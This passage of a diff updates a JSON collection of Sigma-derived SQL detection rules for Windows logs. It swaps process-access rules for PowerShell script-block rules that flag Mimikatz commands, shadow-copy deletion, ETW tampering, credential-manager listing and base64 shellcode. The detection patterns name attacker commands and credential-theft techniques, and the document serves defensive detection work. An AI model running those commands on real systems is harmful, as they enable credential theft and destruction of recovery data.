('\"HybridConnection\" OR \"sb://\" OR \"servicebus.windows.net\" OR \"HybridConnectionManage\"')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Set-ExecutionPolicy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Unrestricted%' ESCAPE '\\' OR ScriptBlockText LIKE '%bypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%RemoteSigned%' ESCAPE '\\')) AND NOT ((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\AppData\\\\Roaming\\\\Code\\\\%' ESCAPE '\\')))" ], - "filename": "win_hybridconnectionmgr_svc_running.yml" + "filename": "posh_ps_set_policies_to_unsecure_level.yml" }, { - "title": "Suspicious Application Installed", - "id": "83c161b6-ca67-4f33-8ad0-644a0737cf07", - "status": "experimental", - "description": "Detects suspicious application installed by looking at the added shortcut to the app resolver cache", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Execute Invoke-command on Remote Host", + "id": "7b836d7f-179c-4ba4-90a7-a7e60afb48e6", + "status": "test", + "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", + "author": "frack113", "tags": [ - "attack.execution" + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Packages or applications being legitimately used by users or administrators" + "Legitimate script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '28115' AND (Name LIKE '%Zenmap%' ESCAPE '\\' OR Name LIKE '%AnyDesk%' ESCAPE '\\' OR Name LIKE '%wireshark%' ESCAPE '\\' OR Name LIKE '%openvpn%' ESCAPE '\\')) OR (EventID = '28115' AND (AppID LIKE '%zenmap.exe%' ESCAPE '\\' OR AppID LIKE '%prokzult ad%' ESCAPE '\\' OR AppID LIKE '%wireshark%' ESCAPE '\\' OR AppID LIKE '%openvpn%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%invoke-command %' ESCAPE '\\' AND ScriptBlockText LIKE '% -ComputerName %' ESCAPE '\\')" ], - "filename": "win_shell_core_susp_packages_installed.yml" + "filename": "posh_ps_invoke_command_remote.yml" }, { - "title": "Suspicious Rejected SMB Guest Logon From IP", - "id": "71886b70-d7b4-4dbf-acce-87d2ca135262", + "title": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script", + "id": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", "status": "test", - "description": "Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service", - "author": "Florian Roth (Nextron Systems), KevTheHermit, fuzzyf10w", + "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1110.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Account fallback reasons (after failed login with specific account)" + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\')" + ], + "filename": "posh_ps_susp_win32_shadowcopy.yml" + }, + { + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell", + "id": "20e5497e-331c-4cd5-8d36-935f6e2a9a07", + "status": "experimental", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "falsepositives": [ + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-SmbClient/Security' AND EventID = '31017' AND UserName = '' AND ServerName LIKE '\\\\1%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (ScriptBlockText LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR ScriptBlockText LIKE '%system.io.streamreader%' ESCAPE '\\') AND ScriptBlockText LIKE '%readtoend' ESCAPE '\\')" ], - "filename": "win_susp_failed_guest_logon.yml" + "filename": "posh_ps_invoke_obfuscation_via_compress.yml" }, { - "title": "Standard User In High Privileged Group", - "id": "7ac407cc-0f48-4328-aede-de1d2e6fef41", + "title": "Powershell Install a DLL in System Directory", + "id": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", "status": "experimental", - "description": "Detect standard users login that are part of high privileged groups such as the Administrator group", - "author": "frack113", + "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.credential_access", - "attack.privilege_escalation" + "attack.t1556.002" ], "falsepositives": [ - "Standard domain users who are part of the administrator group. These users shouldn't have these right. But in the case where it's necessary. They should be filtered out using the \"TargetUserName\" field" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-LSA/Operational' AND (EventID = '300' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND (SidList LIKE '%S-1-5-32-544%' ESCAPE '\\' OR SidList LIKE '%-500}%' ESCAPE '\\' OR SidList LIKE '%-518}%' ESCAPE '\\' OR SidList LIKE '%-519}%' ESCAPE '\\')) AND NOT ((TargetUserSid LIKE '%-500' ESCAPE '\\' OR TargetUserSid LIKE '%-518' ESCAPE '\\' OR TargetUserSid LIKE '%-519' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination %' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Windows\\\\System32%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Windows\\\\SysWOW64%' ESCAPE '\\'))" ], - "filename": "win_lsa_server_normal_user_admin.yml" + "filename": "posh_ps_copy_item_system_directory.yml" }, { - "title": "Loading Diagcab Package From Remote Path", - "id": "50cb47b8-2c33-4b23-a2e9-4600657d9746", + "title": "Disable of ETW Trace - Powershell", + "id": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", "status": "experimental", - "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", + "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" ], "falsepositives": [ - "Legitimate package hosted on a known and authorized remote location" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '101' AND PackagePath LIKE '%\\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-EtwTraceProvider %' ESCAPE '\\' OR (ScriptBlockText LIKE '%Set-EtwTraceProvider %' ESCAPE '\\' AND ScriptBlockText LIKE '%0x11%' ESCAPE '\\')))" ], - "filename": "win_diagnosis_scripted_load_remote_diagcab.yml" + "filename": "posh_ps_etw_trace_evasion.yml" }, { - "title": "Direct Syscall of NtOpenProcess", - "id": "3f3f3506-1895-401b-9cc3-e86b16e630d0", + "title": "Winlogon Helper DLL", + "id": "851c506b-6b7c-4ce2-8802-c703009d03c0", "status": "experimental", - "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", - "author": "Christian Burkard (Nextron Systems), Tim Shelton", + "description": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\nRegistry entries in HKLM\\Software[Wow6432Node]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are\nused to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to\nload and execute malicious DLLs and/or executables.\n", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.execution", - "attack.t1106" + "attack.persistence", + "attack.t1547.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CallTrace LIKE 'UNKNOWN%' ESCAPE '\\' AND NOT ((TargetImage LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceUI.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\' AND SourceImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\systeminfo.exe' ESCAPE '\\' AND SourceImage LIKE '%setup64.exe' ESCAPE '\\') OR (TargetImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\' AND SourceImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Discord.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\AUDIODG.EXE' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND GrantedAccess = '0x1000') OR (Provider_Name = 'Microsoft-Windows-Kernel-Audit-API-Calls') OR (TargetImage LIKE '%\\\\Evernote\\\\Evernote.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CurrentVersion\\\\Winlogon%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Set-ItemProperty%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-Item%' ESCAPE '\\'))" ], - "filename": "proc_access_win_direct_syscall_ntopenprocess.yml" + "filename": "posh_ps_winlogon_helper_dll.yml" }, { - "title": "SysmonEnte Usage", - "id": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", - "status": "experimental", - "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", - "author": "Florian Roth (Nextron Systems)", + "title": "Service Registry Permissions Weakness Check", + "id": "95afc12e-3cbb-40c3-9340-84a032e596a3", + "status": "test", + "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.persistence", + "attack.t1574.011" ], "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND GrantedAccess = '0x1400') AND NOT (((SourceImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\'))) OR CallTrace = 'Ente'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-acl%' ESCAPE '\\' AND ScriptBlockText LIKE '%REGISTRY::HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\')" ], - "filename": "proc_access_win_hack_sysmonente.yml" + "filename": "posh_ps_get_acl_service.yml" }, { - "title": "Suspicious LSASS Access Via MalSecLogon", - "id": "472159c5-31b9-4f56-b794-b766faa8b0a7", + "title": "Potential Invoke-Mimikatz PowerShell Script", + "id": "189e3b02-82b2-4b90-9662-411eb64486d4", "status": "experimental", - "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", - "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", + "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", + "author": "Tim Rauch", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Mimikatz can be useful for testing the security of networks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x14c0' AND CallTrace LIKE '%seclogon.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' AND ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\') OR ScriptBlockText LIKE '%sekurlsa::logonpasswords%' ESCAPE '\\' OR (ScriptBlockText LIKE '%crypto::certificates%' ESCAPE '\\' AND ScriptBlockText LIKE '%CERT\\_SYSTEM\\_STORE\\_LOCAL\\_MACHINE%' ESCAPE '\\')))" ], - "filename": "proc_access_win_susp_seclogon.yml" + "filename": "posh_ps_potential_invoke_mimikatz.yml" }, { - "title": "Potential Svchost Memory Access", - "id": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", - "status": "experimental", - "description": "Detects potential access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", - "author": "Tim Burrell", + "title": "Live Memory Dump Using Powershell", + "id": "cd185561-4760-45d6-a63e-a51325112cae", + "status": "test", + "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Diagnostics" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND (CallTrace LIKE '%Microsoft.Build.ni.dll%' ESCAPE '\\' OR CallTrace LIKE '%System.ni.dll%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-StorageDiagnosticInfo%' ESCAPE '\\' AND ScriptBlockText LIKE '%-IncludeLiveDump%' ESCAPE '\\')" ], - "filename": "proc_access_win_invoke_phantom.yml" + "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml" }, { - "title": "Lsass Memory Dump via Comsvcs DLL", - "id": "a49fa4d5-11db-418c-8473-1e014a8dd462", - "status": "test", - "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Hyper-V Cmdlets", + "id": "42d36aa1-3240-4db0-8257-e0118dcdd9cd", + "status": "experimental", + "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1564.006" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' AND CallTrace LIKE '%comsvcs.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%New-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-VMFirmware%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-VM%' ESCAPE '\\'))" ], - "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml" + "filename": "posh_ps_susp_hyper_v_condlet.yml" }, { - "title": "UAC Bypass Using WOW64 Logger DLL Hijack", - "id": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", + "title": "Code Executed Via Office Add-in XLL File", + "id": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", "status": "test", - "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.persistence", + "attack.t1137.006" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' AND GrantedAccess = '0x1fffff' AND CallTrace LIKE 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject %' ESCAPE '\\' AND ScriptBlockText LIKE '%.application%' ESCAPE '\\' AND ScriptBlockText LIKE '%.RegisterXLL%' ESCAPE '\\')" ], - "filename": "proc_access_win_uac_bypass_wow64_logger.yml" + "filename": "posh_ps_office_comobject_registerxll.yml" }, { - "title": "Potential Shellcode Injection", - "id": "250ae82f-736e-4844-a68b-0b5e8cc887da", - "status": "experimental", - "description": "Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject", - "author": "Bhabesh Raj", + "title": "PowerShell ShellCode", + "id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", + "status": "test", + "description": "Detects Base64 encoded Shellcode", + "author": "David Ledbetter (shellcode), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1055" + "attack.t1055", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (GrantedAccess IN ('0x147a', '0x1f3fff') AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\') AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\DellDataVault\\\\DDVDataCollector.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\Wbem\\\\Wmiprvse.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\\\System.ni.dll+%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%AAAAYInlM%' ESCAPE '\\' AND (ScriptBlockText LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" ], - "filename": "proc_access_win_shellcode_inject_msf_empire.yml" + "filename": "posh_ps_shellcode_b64.yml" }, { - "title": "CMSTP Execution Process Access", - "id": "3b4b232a-af90-427c-a22f-30b0c0837b95", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "Enumerate Credentials from Windows Credential Manager With PowerShell", + "id": "603c6630-5225-49c1-8047-26c964553e0e", + "status": "test", + "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.003", - "attack.execution", - "attack.t1559.001", - "attack.g0069", - "attack.g0080", - "car.2019-04-001" + "attack.credential_access", + "attack.t1555" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace LIKE '%cmlua.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%vaultcmd%' ESCAPE '\\' AND ScriptBlockText LIKE '%/listcreds:%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Web Credentials%' ESCAPE '\\'))" ], - "filename": "proc_access_win_cmstp_execution_by_access.yml" + "filename": "posh_ps_enumerate_password_windows_credential_manager.yml" }, { - "title": "Credential Dumping Tools Accessing LSASS Memory", - "id": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", + "title": "Suspicious PowerShell Mailbox SMTP Forward Rule", + "id": "15b7abbb-8b40-4d01-9ee2-b51994b1d474", "status": "experimental", - "description": "Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools", - "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community", + "description": "Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002", - "car.2019-04-004" + "attack.exfiltration" ], "falsepositives": [ - "Likely" + "Legitimate usage of the cmdlet to forward emails" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '0x40%' ESCAPE '\\' OR GrantedAccess LIKE '0x100000%' ESCAPE '\\' OR GrantedAccess LIKE '0x1410%' ESCAPE '\\' OR GrantedAccess LIKE '0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '0x143a%' ESCAPE '\\' OR GrantedAccess LIKE '0x1418%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f0fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f1fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f2fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f3fff%' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\perfmon.exe' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE 